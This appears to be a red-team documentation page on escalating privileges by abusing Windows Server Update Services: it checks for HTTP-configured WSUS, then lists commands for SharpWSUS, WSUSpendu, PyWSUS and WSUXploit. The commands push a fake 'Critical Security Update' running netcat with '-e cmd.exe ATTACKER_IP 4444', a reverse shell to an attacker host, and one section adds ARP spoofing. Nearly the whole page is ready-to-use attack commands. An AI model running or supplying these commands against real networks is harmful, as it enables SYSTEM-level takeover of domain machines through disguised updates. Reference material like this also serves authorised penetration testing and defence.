> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WSUS Exploitation

> Privilege escalation via Windows Server Update Services: MITM updates to execute as SYSTEM.

## Overview

WSUS (Windows Server Update Services) pushes updates to domain machines. If WSUS uses HTTP (not HTTPS), you can MITM the update process and inject a malicious update that executes as SYSTEM.

***

## Check WSUS Configuration

```cmd theme={"dark"}
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v WUServer
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v UseWUServer
```

```powershell theme={"dark"}
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name WUServer).WUServer
```

### Vulnerable If

* `WUServer` uses `http://` (not `https://`)
* `UseWUServer` = `1`

***

## SharpWSUS

Inject fake update on WSUS server (requires admin on WSUS server or MITM position).

```bash theme={"dark"}
https://github.com/nettitude/SharpWSUS
```

### Create Malicious Update

```cmd theme={"dark"}
SharpWSUS.exe create /payload:"C:\Windows\Temp\nc.exe" /args:"-e cmd.exe ATTACKER_IP 4444" /title:"Critical Security Update"
```

### Approve Update for Target

```cmd theme={"dark"}
SharpWSUS.exe approve /updateid:<UPDATE_GUID> /computername:TARGET.domain.local /groupname:"Critical Updates"
```

### Check Status

```cmd theme={"dark"}
SharpWSUS.exe check /updateid:<UPDATE_GUID> /computername:TARGET.domain.local
```

### Cleanup

```cmd theme={"dark"}
SharpWSUS.exe delete /updateid:<UPDATE_GUID> /computername:TARGET.domain.local
```

***

## WSUSpendu (PowerShell)

```bash theme={"dark"}
https://github.com/AlsidOfficial/WSUSpendu
```

```powershell theme={"dark"}
.\WSUSpendu.ps1 -Inject -PayloadFile nc.exe -PayloadArgs '-e cmd.exe ATTACKER_IP 4444' -ComputerName TARGET
```

***

## PyWSUS — MITM Attack

If on same network and WSUS uses HTTP:

```bash theme={"dark"}
https://github.com/GoSecure/pywsus
```

### ARP Spoofing + Inject

```bash theme={"dark"}
# ARP spoof
arpspoof -i eth0 -t TARGET WSUS_SERVER
arpspoof -i eth0 -t WSUS_SERVER TARGET

# Run PyWSUS
python3 pywsus.py --host ATTACKER_IP --port 8530 -c '/c nc.exe -e cmd.exe ATTACKER_IP 4444' --executable payload.exe
```

***

## WSUXploit

Automated WSUS MITM.

```bash theme={"dark"}
https://github.com/pimps/wsuxploit
```

```bash theme={"dark"}
# wsuxploit is a bash script with positional args: <target> <wsus_ip> <wsus_port> <binary>
./wsuxploit.sh TARGET_IP WSUS_IP 8530 /tmp/payload.exe
```

***

## Quick Reference

| Scenario                  | Tool               |
| ------------------------- | ------------------ |
| Admin on WSUS server      | SharpWSUS          |
| MITM position (HTTP WSUS) | PyWSUS / WSUXploit |
| PowerShell-based          | WSUSpendu          |
